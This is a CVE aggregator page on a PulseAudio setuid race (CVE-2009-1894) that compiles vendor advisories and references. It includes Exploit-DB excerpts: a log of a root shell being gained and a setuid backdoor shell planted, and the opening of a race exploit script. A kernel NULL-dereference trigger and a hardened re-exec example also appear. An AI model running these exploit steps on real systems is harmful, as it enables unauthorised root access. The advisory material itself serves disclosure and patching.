CVE-2009-1894
Published: 2009-07-17
Priority: P432 · high · CVSS 2.0: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
Exploit: available (see the Exploit-DB entries below)
EPSS: 0.74% (49.8th percentile)
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
Affected (10 ranges as listed by the source; identical rows merged)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | pulseaudio | < 0.9.15-4.1 (bookworm) | 0.9.15-4.1 (bookworm) |
| linux | linux_kernel | — | — |
| pulseaudio | pulseaudio | — | — |
| pulseaudio | pulseaudio | >= 0, < 0.9.15-4.1 | 0.9.15-4.1 |
CVSS provenance
- nvd: v2.0 7.2 HIGH (AV:L/AC:L/Au:N/C:C/I:C/A:C)
- osv: 7.2 HIGH
- vendor_debian: 7.2 HIGH
- vendor_redhat: 7.2 HIGH
Ubuntu: PulseAudio vulnerability
vendor_ubuntu · 2009-07-16 · CVE-2009-1894
Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not safely re-execute itself. A local attacker could exploit this to gain root privileges.
Instructions: In general, a standard system upgrade is sufficient to effect the necessary changes.
Red Hat: pulseaudio: privilege escalation flaw via pulseaudio re-exec
vendor_redhat · 2009-07-16 · CVSS 7.2 · CVE-2009-1894 [HIGH] · CWE-271
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
Red Hat: kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
vendor_redhat · 2009-04-09 · CVSS 7.2 · CVE-2009-1897 [HIGH]
The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the Linux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks gcc option is omitted, allows local users to gain privileges via vectors involving a NULL pointer dereference and an mmap of /dev/net/tun, a different vulnerability than CVE-2009-1894.
Statement: The flaw only affects the Red Hat Enterprise Linux 5.4 beta kernel, which includes a backport of the upstream bug fix introducing this flaw (git commit 33dccbb0). This issue did not affect the final released Red Hat Enterprise Linux 5.4 kernel. It is also possible to mitigate this flaw by ensuring that the permissions for /dev/net/tun are restricted to root only.
This issue does
Debian: pulseaudio
vendor_debian · 2009 · CVSS 7.2 · CVE-2009-1894 [HIGH]
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
Scope: local
bookworm: resolved (fixed in 0.9.15-4.1)
bullseye: resolved (fixed in 0.9.15-4.1)
forky: resolved (fixed in 0.9.15-4.1)
sid: resolved (fixed in 0.9.15-4.1)
trixie: resolved (fixed in 0.9.15-4.1)
GHSA: GHSA-7g2j-wp9p-8rcr
ghsa_unreviewed · 2022-05-02 · CVSS 7.2 · CVE-2009-1897 [HIGH] · CWE-119
The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the Linux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks gcc option is omitted, allows local users to gain privileges via vectors involving a NULL pointer dereference and an mmap of /dev/net/tun, a different vulnerability than CVE-2009-1894.
GHSA: GHSA-8qwr-xcgg-6rcv
ghsa_unreviewed · 2022-05-02 · CVE-2009-1894 [HIGH] · CWE-362
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
OSV: CVE-2009-1894
osv · 2009-07-17 · CVSS 7.2 · CVE-2009-1894 [HIGH]
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.
No detection rules found.
Exploit-DB: GNU C library dynamic linker - '$ORIGIN' Expansion
exploitdb · 2010-10-18 · CVSS 6.9 · CVE-2011-0536 [MEDIUM]
---
from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2
The GNU C library dynamic linker expands $ORIGIN in setuid library search path
Gruezi, This is CVE-2010-3847.
The dynamic linker (or dynamic loader) is responsible for the runtime linking of dynamically linked programs. ld.so operates in two security modes, a permissive mode that allows a high degree of control over the load operation, and a secure mode (libc_enable_secure) intended to prevent users from interfering with the loading of privileged executables.
$ORIGIN is an ELF substitution sequence representing the location of the executable being loaded in the filesystem hierarchy. The intention is to allow executables to specify a search path for libraries that is
Exploit-DB: PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
exploitdb · 2009-07-20 · CVE-2009-1894
---
PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster
--
Put files in /tmp/pulseaudio-exp (or change config.h). Must be on same fs as the pulseaudio binary.
Goes faster if you already have a pulseaudio running ? :p
Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0 (x86)
Ubuntu:
```text
$ ./c.sh
$ ./pulseaudio-exp
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root)
groups=4(adm),20(dialout),24(cdrom),46(plugdev)
```
Exploit-DB: PulseAudio setuid - Local Privilege Escalation
exploitdb · 2009-07-20 · CVE-2009-1894
---
```bash
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
function cleanup()
{
rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
rm -rf $workdir/PATMP*
}
cat > $workdir/pa_race.c
#include
#include
#include
#include
#include
#define PULSEAUDIO_PATH "$pulseaudio"
#define SH_PATH "$workdir/sh"
#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"
void _pause(long sec, long usec);
int main(int argc, char *argv[], char *envp[])
{
int status;
pid_t pid;
char template[sizeof(TMPDIR_TEMPLATE)];
char *tmpdir;
char hardlink[sizeof(template) + 2];
char hardlink2[sizeof(template) + 12];
srand(time(NULL));
for( ; ; )
{
snprintf(template, sizeof(template), "%s", TMPDIR_T
```
Bugzilla: CVE-2009-1897 kernel: tun/tap: Fix crashes if open() /dev/net/tun and then poll() it
bugzilla · 2009-07-17 · CVSS 6.9 · CVE-2009-1897 [MEDIUM]
Reported by Eugene Kapun:
Fix NULL pointer dereference in tun_chr_poll() introduced by commit 33dccbb050bbe35b88ca8cf1228dcf3e4d4b3554 ("tun: Limit amount of queued packets per device") and triggered by this code:
```c
int fd;
struct pollfd pfd;
fd = open("/dev/net/tun", O_RDWR);
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);
```
Upstream commit:
http://git.kernel.org/linus/3c8a9c63d5fd738c261bd0ceece04d9c8357ca13
References:
http://lkml.org/lkml/2009/7/6/19
https://bugzilla.redhat.com/show_bug.cgi?id=495863
http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069714.html
http://git.kernel.org/linus/33dccbb050bbe35b88ca8cf1228dcf3e4d4b3554
http://article.gmane.org/gmane.linux.network/1249
Bugzilla: CVE-2009-1894 pulseaudio: privilege escalation flaw via pulseaudio re-exec
bugzilla · 2009-07-07 · CVSS 7.2 · CVE-2009-1894 [HIGH]
Tavis Ormandy and Julien Tinnes, Google Security Team, discovered a flaw in pulseaudio that allows local users to escalate their privileges to root if pulseaudio is installed setuid.
When pulseaudio is built on a Linux system with compiler optimization enabled, it tries to re-exec itself with the LD_BIND_NOW environment variable set to 1.
http://git.0pointer.de/?p=pulseaudio.git;a=blob;f=src/daemon/main.c;h=b58bb379#l403
This happens before root privileges are dropped. The command to execute is extracted from /proc. This approach is prone to a race condition and can allow a local user to execute a different command with root privileges.
Discussion:
Some vendors wanted an embargo date of Jul9, please do not make public com
References:
- http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html
- http://secunia.com/advisories/35868
- http://secunia.com/advisories/35886
- http://secunia.com/advisories/35896
- http://security.gentoo.org/glsa/glsa-200907-13.xml
- http://taviso.decsystem.org/research.html
- http://www.akitasecurity.nl/advisory.php?id=AK20090602
- http://www.debian.org/security/2009/dsa-1838
- http://www.mandriva.com/security/advisories?name=MDVSA-2009:152
- http://www.mandriva.com/security/advisories?name=MDVSA-2009:171
- http://www.securityfocus.com/archive/1/505052/100/0/threaded
- http://www.securityfocus.com/bid/35721
- http://www.ubuntu.com/usn/usn-804-1
- https://admin.fedoraproject.org/updates/pulseaudio-0.9.10-1.el5.2
- https://bugzilla.redhat.com/show_bug.cgi?id=510071
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51804
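The hardened counterpart of the re-exec the Bugzilla entry describes, as an added example that is neither PulseAudio's code nor its actual fix: instead of reading the /proc/self/exe link and handing the resulting path to execv, the program opens /proc/self/exe, inspects the image with fstat, and passes the descriptor to fexecve, so the inode pinned at open time is what runs. The trust policy in trusted_self_image and all function names are assumptions made for illustration.

```c
/* Added example, not PulseAudio's own code: re-exec the running image via a
 * descriptor instead of a path. Assumes Linux/glibc; fexecve needs /proc. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

extern char **environ;

/* Illustrative trust policy for an image that will run as root: a regular
 * file owned by root and not writable by group or others (no side effects). */
int trusted_self_image(const struct stat *st)
{
    return S_ISREG(st->st_mode) && st->st_uid == 0 &&
           !(st->st_mode & (S_IWGRP | S_IWOTH));
}

/* Re-exec with LD_BIND_NOW=1. Opening /proc/self/exe pins the inode of the
 * image actually executing: a hard link swapped between lookup and exec
 * changes the path but not the inode, so fexecve runs the same binary.
 * Returns -1 on failure; on success it does not return. */
int reexec_self(char *const argv[])
{
    struct stat st;
    int fd = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !trusted_self_image(&st) ||
        setenv("LD_BIND_NOW", "1", 1) != 0) {
        close(fd);
        return -1;
    }
    fexecve(fd, argv, environ);   /* only returns on error */
    close(fd);
    return -1;
}

int main(int argc, char *argv[])
{
    (void)argc;
    if (getenv("LD_BIND_NOW")) {  /* second pass: already re-executed */
        puts("re-executed image running");
        return 0;
    }
    if (reexec_self(argv) != 0)
        fputs("reexec_self: refused or failed\n", stderr);
    return 1;
}
```

Run unprivileged, the binary is not root-owned, so trusted_self_image refuses and the program exits without re-executing; installed root-owned and mode 0755 it re-execs itself once and prints the second-pass message.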